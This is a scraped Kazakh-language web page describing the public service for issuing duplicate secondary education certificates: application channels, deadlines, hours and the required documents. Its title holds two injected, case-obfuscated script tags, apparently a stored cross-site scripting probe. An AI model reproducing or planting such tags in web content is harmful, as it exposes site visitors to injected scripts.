«Негізгі орта, жалпы білім туралы құжаттардың телнұсқаларын беру» мемлекеттік қызмет көрсету<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.04.2025

Мемлекеттік қызметті көрсету үшін құжаттарды қабылдау және беру көрсетілетін қызметті берушінің кеңсесі, «электрондық үкіметтің» веб-порталы арқылы жүзеге асырылады. Қызмет көрсету мерзімі - 15 жұмыс күні, қызмет көрсету нысаны – электрондық (ішінара автоматтандырылған)/қағаз түрінде. Мемлекеттік қызмет Жеке тұлғаларға тегін көрсетіледі. Мереке күндерін қоспағанда, дүйсенбіден жұмаға дейін құжаттарды қабылдау сағат 13:00-ден 14:30-ға дейінгі түскі үзіліспен сағат 09.00-ден 18:00-ға дейін жүзеге асырылады. Мемлекеттік қызмет көрсету үшін қажетті құжаттар мен мәліметтер тізбесі: 1) құжатын жоғалтқан немесе бүлдірген білім алушының немесе кәмелет жасқа толмаған баланың ата-анасының (заңды өкілінің) негізгі орта және жалпы орта білім беру ұйымы басшысының атына өтініші; 2) білім алушының туу туралы куәлігі немесе жеке куәлігі; 3) білімі туралы құжаттың тегі, аты өзгерген немесе бүлінген кезде білімі туралы құжаттың түпнұсқасы қоса беріледі. Бірыңғай байланыс орталығы«1414», 8-800-080-7777

Просмотров: 4366


Пікір қосу



Деректерді қолтаңбаға қосу